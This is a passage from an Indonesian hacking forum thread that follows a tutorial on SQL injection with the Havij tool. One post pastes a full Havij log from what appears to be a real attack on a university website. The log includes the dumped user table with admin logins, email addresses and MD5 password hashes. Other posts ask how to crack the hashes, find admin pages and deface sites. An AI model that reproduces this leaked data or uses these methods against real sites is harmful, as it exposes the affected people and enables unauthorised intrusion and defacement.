Page 11 of 12

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Sat Aug 13, 2011 7:21 am
by ayong33
kok gak bsa gan hash md5.nya...
ad cara laen gak...?

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Sat Aug 13, 2011 1:13 pm
by un4m3d
kk ..
find admin nya kok gag nemu jg yah, padahal aku udah dapet yg vurn neh
dan dapet semua akses masuknya termasuk login user + pass 'na

Host IP: ***.**.***.**
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.2.10-2ubuntu6
Keyword Found: p><b
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 5
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: cecial
Count(table_name) of information_schema.tables Where table_schema=0x63656369616C is 18
Tables found: tbl_arquivos,tbl_banners,tbl_categoria,tbl_email,tbl_emails,tbl_fotogaleria,tbl_imagens,tbl_mala_direta,tbl_menu,tbl_menu_adm,tbl_newsletter,tbl_noticias,tbl_paginas,tbl_status,tbl_submenu,tbl_submenu_adm,tbl_tipos,tbl_usuarios
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F656D61696C is 2
Columns found: id_email,email
Count(*) of cecial.tbl_email is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Canceling...
Job Canceled!
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F6D656E755F61646D is 4
Columns found: id_menu_adm,item_menu_adm,link_menu_adm,nivel_acesso
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F7573756172696F73 is 6
Columns found: id_usuario,nome_usuario,email_usuario,nivel_acesso,login_usuario,senha_usuario
Count(*) of cecial.tbl_usuarios is 3
Data Found: login_usuario=admin
Data Found: email_usuario=cecial@ufpr.br
Data Found: nome_usuario=Administrador
Data Found: senha_usuario=87ed1dc579ed6a53528cea33d75eaed5
Data Found: nivel_acesso=1
Data Found: id_usuario=1
Data Found: login_usuario=jornalista
Data Found: email_usuario=cecial@ufpr.br
Data Found: nome_usuario=Jornalista
Data Found: senha_usuario=3605fb0da091e9069f6da957932f1789
Data Found: nivel_acesso=2
Data Found: id_usuario=2
Data Found: login_usuario=hamilton
Data Found: email_usuario=hamilton@ufpr.br
Data Found: nome_usuario=Hamilton
Data Found: senha_usuario=b3edb2df76bc59cafe10222b9e9b4223
Data Found: nivel_acesso=1
Data Found: id_usuario=3

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Mon Aug 15, 2011 12:44 am
by poni
Kadang admin mengubah nama page login supaya tidak gampang ditemukan oleh pihak luar.

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Sun Aug 21, 2011 6:35 am
by detta3690
om mau tanya dong.. kalo webnya gini http://site.com/?
gmn? kan ga ada index php atau semacamnya..ga bisa di analyze dong..:(

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Tue Aug 30, 2011 11:16 pm
by veronochi
bagus om tutornya nie...

sayang ya havij untuk windows coba ada versi linuxnya keren dah...

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Thu Sep 29, 2011 10:18 am
by djisamsoe
mantabs..bro :idea:

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Wed Oct 12, 2011 8:27 am
by kalil45
gan ane gak bisa crack MD5 nya untuk menjadi paswor,,
bantuan dan pencerahan di tunggu

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Fri Oct 21, 2011 10:45 pm
by Tobyazx77x
om poni saya mau nanya nih kan saya mau nge deface web lain udah ketemu admin login nya
tapi cara nyari username and pass nya gimana?
maaf kalo ganggu :)

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Mon Oct 24, 2011 7:20 pm
by M4d3X
masih bisa nggk oms?

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

PostPosted: Fri Nov 18, 2011 12:08 am
by ladade
klo nyari" vulnerablenya gmana caranya?